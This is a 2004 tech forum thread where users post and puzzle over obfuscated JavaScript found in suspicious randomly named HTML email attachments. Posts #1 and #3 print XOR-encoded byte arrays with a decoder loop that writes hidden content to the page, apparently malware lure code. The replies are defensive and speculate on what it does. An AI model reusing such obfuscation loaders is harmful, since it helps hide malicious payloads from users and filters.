MSFN Forum: HTML E-Mails - MSFN Forum

Jump to content



Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

HTML E-Mails Rate Topic: -----

#1 User is offline   gamehead200 

  • SEARCH!!! SEARCH!!!
  • Group: Super Moderator
  • Posts: 7,019
  • Joined: 02-September 02
  • OS:Windows 7 x64
  • Country: Country Flag

Posted 22 February 2004 - 01:03 PM

Lately, I've been getting e-mails with randomly named HTML files attached to them...

The e-mail says the following:

Quote

This message has an attach


Don't know what it is, I haven't opened the HTML file in a browser, but I have looked at the source code... Its a javascript file, but I have no idea what it does...

Here is part of the HTML file:
pained = new Array(176,
189,158,182,20,111,187,189,41,135,79,
89,172,235,225,203,197,123,151,193,165,
203,90,215,116,156,158,42,167,151,3,
189,143,208,36,207,189,67,52,169,184,
11,205,93,132,73,157,230,102,64,199,
137,61,131,230,228,219,177,61,81,29,
251,189,57,10,165,154,171,8,51,72,
75,133,109,106,97,53,47,115,77,20,
113,46,251,82,174,9,21,121,201,135,
53,182,151,157,48,193,90,112,84,169,
222,231,111,107,93,16,150,198,64,203,
56,237,203,210,31,165,13,164,121,39,
216,83,177,163,209,23,113,75,88,96,
29,183,131,22,99,236,76,150,243,64,
76,92,105,121,134,78,107,120,14,180,
105,244,45,51,145,1,61,247,76,41,
10,246,20,57,143,170,56,98,130,76,
199,78,213,65,127,162,168,112,23,248,
1,39,107,93,58,188,158,130,58,123,
145,184,112,88,57,134,173,144,152,10,
185,162,224,185,179,171,210,222,176,248,
43,139,110,202,136,230,0,16,160,70,
127,78,239,28,197,174,235,162,190,10,
52,150,206,75,248,98,36,249,229,226,
143,218,44,244,175,136,178,9,135,57,
156,156,58,224,145,81,235,225,191,123,
131,248,72,115,246,246,77,205,95,148,
26,194,175,101,74,143,139,127,200,170,
235,148,179,61,87,0,174,255,17,56,
181,222,244,24,125,19,22,146,40,34,
106,63,60,60,79,31,106,55,251,29,
245,67,21,58,129,157,101,239,215,138,
97,144,90,122,69,149,251,234,39,100,
76,14,154,215,71,147,109,191,128,212,
31,173,19,164,121,72,251,125,141,148,
185,45,86,118,48,87,121,205,243,22,
84,203,97,173,161,45,43,45,105,122,
245,42,123,24,99,216,106,187,14,6,
227,51,16,202,122,31,21,162,90,46,
212,182,118,102,130,87,199,80,216,94,
47,244,202,14,38,130,70,47,117,88,
46,242,194,206,61,62,139,164,112,10,
105,221,226,130,215,5,191,231,179,165,
174,162,150,210,185,245,109,135,111,210,
217,168,18,66,189,13,51,66,175,12,
148,224,188,141,181,69,115,213,210,74,
249,39,33,178,183,178,201,211,43,238,
235,219,168,28,194,105,223,199,97,224,
154,81,243,131,199,119,153,251,119,80,
167,180,93,146,17,206,39,161,219,60,
109,191,249,77,128,230,200,225,143,114,
107,111,141,190,49,13,222,239,223,24,
86,63,37,168,64,8,82,2,10,6,
38,42,64,122,194,59,161,104,34,66,
248,224,46,197,247,186,22,226,50,36,
91,164,222,176,56,42,89,92,207,159,
89,144,66,214,217,202,75,169,13,239,
32,26,160,48,128,133,247,42,90,126,
119,84,103,158,190,88,67,132,126,171,
169,117,52,44,26,30,229,121,36,68,
46,148,26,246,94,52,133,112,73,142,
47,78,11,246,90,120,217,228,114,98,
208,0,219,4,157,30,53,179,138,8,
70,252,20,112,49,26,62,189,206,143,
35,49,206,227,36,18,52,200,227,147,
129,13,168,245,162,254,161,186,130,144,
167,228,72,167,76,227,234,158,126,122,
198,67,114,94,150,120,213,195,128,190,
247,88,24,226,144,119,173,4,1,213,
204,174,251,243,101,206,153,241,239,90,
136,53,195,206,108,166,150,80,235,210,
137,101,203,230,60,28,171,244,77,195,
95,153,14,128,178,62,70,159,197,124,
196,180,165,138,225,52,76,78,173,190,
12,37,239,207,166,26,36,84,87,135,
34,110,124,34,116,108,76,58,67,106,
187,88,177,4,89,93,233,225,35,193,
153,169,22,226,85,93,50,214,209,133,
30,16,120,35,167,249,102,224,111,154,
170,232,75,145,46,211,123,91,251,125,
141,148,167,98,16,124,107,103,81,196,
161,22,86,200,100,165,189,45,43,109,
74,82,177,127,57,10,127,218,8,164,
67,127,201,124,9,158,126,0,92,173,
85,101,147,245,114,106,153,71,193,82,
215,82,32,236,155,119,33,180,81,102,
102,88,52,181,205,157,123,125,154,162,
97,79,105,154,175,202,216,20,243,143,
153,236,185,238,142,144,236,189,101,213,
35,197,130,250,73,87,241,34,7,66,
240,92,203,129,223,214,171,88,48,218,
222,67,227,127,113,243,236,224,219,217,
55,184,245,148,238,22,153,89,247,206,
51,224,152,82,246,139,219,119,153,187,
84,120,227,225,31,128,13,204,70,158,
177,17,47,198,219,40,192,170,238,211,
179,111,1,67,188,240,11,41,231,136,
165,79,120,5,31,196,57,109,51,62,
38,58,79,27,96,46,171,84,224,6,
15,102,216,212,62,162,209,138,43,220,
79,37,84,234,156,162,98,114,27,76,
144,223,68,129,53,243,129,213,5,173,
79,238,51,25,241,48,221,148,241,59,
76,105,106,86,116,153,239,10,24,212,
51,207,217,29,3,50,0,94,170,126,
50,22,76,236,42,222,65,93,171,52,
20,210,33);
soothes = new Array(140,
213,234,219,120,81,182,183,36,141,66,
83,144,137,142,175,188,69,154,203,168,
193,102,167,84,253,242,67,192,249,62,
159,236,181,74,187,216,49,22,151,132,
109,162,51,240,105,238,143,28,37,250,
171,8,161,198,135,180,221,82,35,32,
217,158,127,76,149,170,155,56,17,118,
119,228,77,2,19,80,73,78,111,124,
5,90,139,104,129,38,103,20,189,178,
3,128,185,254,95,172,117,10,123,152,
241,214,87,68,45,98,243,176,41,174,
79,220,229,186,107,200,97,134,71,116,
157,18,227,224,153,94,63,12,85,106,
91,248,209,54,55,164,13,194,211,16,
9,14,47,60,197,26,75,40,65,230,
39,212,125,114,195,64,121,190,31,108,
53,202,59,88,177,150,23,4,237,34,
179,112,233,110,15,156,165,122,43,136,
33,70,7,52,93,210,163,160,89,30,
255,204,21,42,27,184,145,246,247,100,
205,130,147,208,201,206,239,252,133,218,
11,232,1,166,231,148,61,50,131,0,
57,126,223,44,245);
remembers = 1064;
depth = 226;
var deceit = "";
for(preaching = 0; preaching < remembers; preaching++)
  deceit = deceit + String.fromCharCode(pained[preaching] ^ soothes[preaching % depth]);
document.write(deceit)


I didn't include the <script language="Javascript"> part because sometimes the code executes in forums when it's posted as code or a quote... :rolleyes:

Anyone know what this does? :)

#2 User is offline   Datalore 

  • Friend of MSFN
  • PipPipPipPipPip
  • Group: Members
  • Posts: 852
  • Joined: 05-October 03

Posted 22 February 2004 - 04:24 PM

If you were to ask me, it looks malacious. My guess is they used a system similar to BASE64 to encode a trojan command, and found a buffer overflow in document.write to execute a string instead of write it to the screen. That was my first guess. Then I looked at the code again, and it looks like just stupid code that writes stuff to the screen. Who knows. Don't run it :)

#3 User is offline   XtremeMaC 

  • MSFN SuperB
  • PipPipPipPipPipPipPipPipPipPip
  • Group: Members
  • Posts: 5,070
  • Joined: 13-October 03

Posted 23 February 2004 - 01:01 PM

i just got a similar email I had always deleted them b4
but now that u mentioned it i looked inside to see what it was

concurrent.html said:

<script language="JavaScript">
grotesquely = new Array(185,
146,95,165,77,152,234,158,1,122,198,
65,125,64,210,38,201,231,158,108,16,
118,191,176,217,146,94,85,216,91,166,
42,88,24,153,45,135,116,162,135,117,
176,67,3,118,176,203,233,187,158,230,
90,96,141,226,118,193,127,59,228,253,
254,149,147,106,233,168,218,164,17,215,
49,137,220,33,169,131,17,207,164,133,
122,130,247,14,119,241,226,4,206,90,
145,29,139,208,117,65,199,153,59,146,
242,191,130,251,49,66,77,169,255,22,
43,251,245,242,92,44,66,71,211,111,
60,30,90,117,97,39,57,68,30,181,
101,139,26,23,52,220,222,106,231,215,
195,125,207,16,100,15,253,131,244,105,
13,75,66,138,223,92,220,111,190,151,
213,28,187,4,244,103,16,242,50,141,
143,237,126,77,105,49,3,41,224,185,
127,200,113,202,130,245,78,87,163,67,
117,55,156,103,213,182,154,56,25,36,
178,162,144,192,27,68,221,94,245,115,
74,73,136,58,132,113,183,145,105,188,
1,9,99,241,239,196,229,218,226,87,
110,215,209,66,228,46,58,241,253,235,
240,213,33,167,249,155,242,82,159,98,
219,145,34,173,137,95,246,139,219,21,
210,188,12,34,167,179,79,156,123,181,
59,171,179,51,68,196,151,39,209,248,
138,190,225,125,107,116,148,210,65);
disbursed = new Array(133,
218,11,232,1,166,231,148,61,50,131,
0,57,126,223,44,245,138,251,24,113,
86,215,196,173,226,115,48,169,46,207,
92,101,58,235,72,225,6,199,244,29,
146,99,96,25,222,191,140,213,234,219,
120,81,182,183,36,141,66,83,144,137,
142,175,188,69,154,203,168,193,102,167,
84,253,242,67,192,249,62,159,236,181,
74,187,216,49,22,151,132,109,162,51,
240,105,238,143,28,37,250,171,8,161,
198,135,180,221,82,35,32,217,158,127,
76,149,170,155,56,17,118,119,228,77,
2,19,80,73,78,111,124,5,90,139,
104,129,38,103,20,189,178,3,128,185,
254,95,172,117,10,123,152,241,214,87,
68,45,98,243,176,41,174,79,220,229,
186,107,200,97,134,71,116,157,18,227,
224,153,94,63,12,85,106,91);
cremates = 290;
colonizers = 179;
var Aztecan = "";
for(statues = 0; statues < cremates; statues++)
  Aztecan = Aztecan + String.fromCharCode(grotesquely[statues] ^ disbursed[statues % colonizers]);
document.write(Aztecan);
</script>

#4 User is offline   XtremeMaC 

  • MSFN SuperB
  • PipPipPipPipPipPipPipPipPipPip
  • Group: Members
  • Posts: 5,070
  • Joined: 13-October 03

Posted 23 February 2004 - 01:02 PM

crap bump press twice..
anyways here's the screenshot of the email
edit: image removed...
edit: removed..

This post has been edited by XtremeMaC: 07 July 2004 - 10:00 AM

#5 User is offline   XPerties 

  • MSFN OG Senior
  • Group: Patrons
  • Posts: 2,989
  • Joined: 18-August 01

Posted 23 February 2004 - 02:40 PM

My servers get 300-400 of these each day blocking them from my clients inboxes. Don't open them, especially the .scr ones.

Most of the viruses have calmed down the last few days so hopefully the run of the life is over.

#6 User is offline   HyDeNCiTy 

  • Advanced Member
  • PipPipPip
  • Group: Members
  • Posts: 420
  • Joined: 05-March 04

Posted 19 March 2004 - 09:31 AM

Looks like malicious to me....

Share this topic:


Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users



All trademarks mentioned on this page are the property of their respective owners
Copyright © 2001 - 2011 msfn.org
Privacy Policy